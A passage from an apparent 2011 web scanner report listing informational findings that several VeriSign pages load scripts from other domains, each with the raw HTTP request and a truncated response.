HTTP/1.1 200 OK Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.17 Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000 Vary: Cookie ETag: "1315602201" Content-Type: text/html; charset=utf-8 X-Varnish: 1369354087 1369326710 X-Varnish-Cache: HIT X-Varnish-Hits: 287 Vary: Accept-Encoding Content-Length: 80043 Cache-Control: public, max-age=1794 Date: Fri, 09 Sep 2011 21:34:13 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"> <head> <met...[SNIP]... <![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>...[SNIP]...
15.32. http://www.verisign.ch/
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /
Issue detail
The response dynamically includes the following scripts from other domains:
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /?tid=header-logo HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 31344 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]...
15.33. http://www.verisign.ch/contact-information/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /contact-information/index.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /contact-information/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 39107 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link rel="stylesheet" href="/assets/corp/css/corp_generic_st...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
15.34. http://www.verisign.ch/corporate/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /corporate/index.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js
http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js
http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent
http://www.verisign.com/hp07/j/swfobj.js
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
Request
GET /corporate/index.html?tid=footer HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 36193 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" language="JavaScript"> </script><script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js" language="JavaScript"> </script><script type="text/JavaScript" src="//www.verisign.com/hp07/j/swfobj.js"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <div id="playerTVAD"> <script src="http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]...
15.35. http://www.verisign.ch/trust-seal/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.ch
Path: /trust-seal/index.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://cdn.verisign.com/assets/shared/js/curvycorners.js
http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911
http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js
http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en
https://www.verisign.com/js/mbox.js
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.ch Proxy-Connection: keep-alive Referer: http://www.verisign.ch/corporate/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:10 GMT Server: Apache X-Powered-By: PHP/5.2.13 X-UA-Compatible: IE=EmulateIE7 Content-Type: text/html Content-Length: 50059 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>VeriSign Trust Seal - Perfec...[SNIP]... </script><script type="text/JavaScript" src="https://www.verisign.com/js/mbox.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... <div id="header_seal"> <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&size=S&use_flash=YES&use_transparent=YES&lang=en"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script>...[SNIP]... </p> <script type="text/javascript" src="http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js"> </script>...[SNIP]... </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"> </script>...[SNIP]... </div> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"> </script> <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"> </script>...[SNIP]... <![endif]--><script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"> </script>...[SNIP]... 
<!-- Promo script--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"> </script>...[SNIP]... <!-- Pre-load promo images to display correctly in promo--><script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js"> </script>...[SNIP]...
15.36. http://www.verisign.com/
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /
Issue detail
The response dynamically includes the following script from another domain:
https://www.googleadservices.com/pagead/conversion.js
Request
GET / HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:37 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:24:37 GMT Content-Type: text/html Content-Length: 34615 <!DOCTYPE html> <html lang=""> <head> <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.37. http://www.verisign.com/code-signing/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /code-signing/index.html
Issue detail
The response dynamically includes the following scripts from other domains:
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://www.googleadservices.com/pagead/conversion.js
Request
GET /code-signing/index.html?tid=a_box HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:27:08 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:27:08 GMT Content-Type: text/html Content-Length: 103179 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <!--HEADER ASSETS...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/index.html
Issue detail
The response dynamically includes the following script from another domain:
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /partners/ssl-reseller-programs/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:13 GMT Content-Type: text/html Content-Length: 51846 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html
Issue detail
The response dynamically includes the following script from another domain:
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:24 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:24 GMT Content-Type: text/html Content-Length: 34515 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /partners/ssl-reseller-programs/resell-ssl/index.html
Issue detail
The response dynamically includes the following script from another domain:
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:28:19 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:28:19 GMT Content-Type: text/html Content-Length: 37523 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <!--HEADER ASSETS--> <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" /> <!--[if lte IE 7...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]...
15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /ssl/buy-ssl-certificates/index.html
Issue detail
The response dynamically includes the following scripts from other domains:
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
https://www.googleadservices.com/pagead/conversion.js
Request
GET /ssl/buy-ssl-certificates/index.html HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623602|PC#1315621455064-973488.19#1378693742|check#true#1315621802; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509977-4-99____; __fds_fp_id__=44590564957.1; TLTHID=04A3BA7EDB2F10DB4C00B1847A7DDBAF
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:59:43 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:59:43 GMT Content-Type: text/html Content-Length: 104571 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <META HTTP-EQUIV="X-UA-Compatible" CONTENT="IE=EmulateIE7" /> <!--HEADER ASSETS--> <link href="ht...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... </script> <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
15.42. http://www.verisign.com/trust-seal/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /trust-seal/index.html
Issue detail
The response dynamically includes the following scripts from other domains:
http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
GET /trust-seal/index.html?tid=gnps HTTP/1.1 Host: www.verisign.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:26:13 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Sun, 09 Oct 2011 21:26:13 GMT Content-Type: text/html Content-Length: 49851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META HTTP-EQUIV="X-UA-Comp...[SNIP]... <div class="emailPrint" id="emailPrint"> <script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign"> </script>...[SNIP]... <div id="vid_container"> <script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent"> </script>...[SNIP]...
15.43. http://www.verisign.com/verisign-worldwide/index.html
Summary
Severity: Information
Confidence: Certain
Host: http://www.verisign.com
Path: /verisign-worldwide/index.html
Issue detail
The response dynamically includes the following script from another domain:
https://s7.addthis.com/js/250/addthis_widget.js?username=verisign
Request
